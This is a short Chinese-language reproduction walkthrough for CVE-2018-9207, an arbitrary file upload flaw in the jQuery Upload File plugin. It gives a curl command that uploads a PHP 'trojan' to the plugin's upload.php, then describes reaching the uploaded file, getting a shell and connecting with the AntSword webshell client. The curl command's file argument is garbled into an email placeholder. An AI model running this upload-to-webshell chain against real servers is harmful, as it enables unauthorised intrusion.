jquery文件上传(CVE-2018-9207)

漏洞描述:

 jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。 jQuery Upload File <= 4.0.2 中的任意文件上传 根目录下/jquery-upload-file。

复现过程:

1.访问ip:port

jquery文件上传(CVE-2018-9207)_第1张图片

2.准备好phpinfo.php文件,在文件目录下cmd

3.通过crul命令上传木马文件phpinfo.php                

curl -F "[email protected]" "http://ip:port/jquery-upload-file/php/upload.php"

jquery文件上传(CVE-2018-9207)_第2张图片

4.打开文件位置正常解析php文件

http://ip:port/jquery-upload-file/php/uploads/phpinfo.php

jquery文件上传(CVE-2018-9207)_第3张图片

5.Getshell

jquery文件上传(CVE-2018-9207)_第4张图片

6.蚁剑连接

jquery文件上传(CVE-2018-9207)_第5张图片

jquery文件上传(CVE-2018-9207)_第6张图片

你可能感兴趣的:(android)